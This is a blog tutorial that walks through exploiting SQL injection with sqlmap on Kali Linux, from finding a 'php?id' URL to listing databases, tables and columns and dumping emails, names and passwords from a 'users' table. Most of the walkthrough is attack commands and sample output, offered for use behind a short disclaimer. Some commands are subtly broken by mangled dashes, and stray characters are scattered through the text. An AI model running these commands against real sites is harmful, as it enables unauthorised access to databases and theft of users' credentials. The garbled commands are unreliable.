Search Here

Sunday, 29 May 2016

Exploit SQL Injection Using Sqlmap in kali linux

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs
5
when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables 
c


The result should be something like this :
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns

The result should be like this :f
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
 and here’s the final result : we have got the name, mail and password:
z